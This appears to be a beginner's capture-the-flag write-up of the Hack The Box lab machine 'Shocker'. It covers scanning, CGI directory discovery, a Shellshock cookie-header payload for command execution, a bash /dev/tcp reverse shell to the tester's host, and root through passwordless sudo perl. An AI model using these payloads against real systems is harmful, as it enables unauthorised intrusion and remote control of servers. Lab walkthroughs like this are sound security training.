Hello EveryOne,this my first write up so bare with me for grammatic mistakes
This Write-up is about retired machine shocker on hack the box platform
Lets start hacking
Nmap scan:
nmap -sC -sV -oA nmap 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see there is only two ports open port 80 http with apache 2.4.18 & port 2222 ssh with version 7.2p2
Searchsploit:
when do a searchsploit on apache 2.4.18 and openssh 7.2p2 there is no vulnerbility for our help
Nikto scan:
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 10.10.10.56
+ Target Hostname: 10.10.10.56
+ Target Port: 80
+ Start Time: (GMT-7)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8673 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: (GMT-7) (1998 seconds)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested
NIkto scan also doesn’t reveal much
dirbuster for directory bruteforce:
We can see that there is directory which has status code of 403 but it interest me as it is an /cgi-bin/ directory ,after a quick google i got to know can execute scripts on web server
Now i change url to http://10.10.10.56/cgi-bin and change extension to sh,pl
Now we can see there is an directory with status code 200 and its an shell file user.sh on browsing it pops a download user.sh file
BurpSuite:
Lets fireup our Burp and capture the request
Since it is a cgi-bin and cgi-bin is mostly vulnerable to shell-shock
Shell Shock and reverse shell:
lets add a custom header to check for shell shock simply add
Cookie: () { :; }; echo ; /bin/ls
We can see it echos user.sh implies we can execute command lets go for reverse shell
bash -i >& /dev/tcp/10.10.14.13/8000 0>&1
Finally got a shell with user shelly
Privilage Escalation:
when i type sudo -L
its show user can execute /usr/bin/perl without any password lets try to gain root using this misconfiguration
Now finally we gained root access to box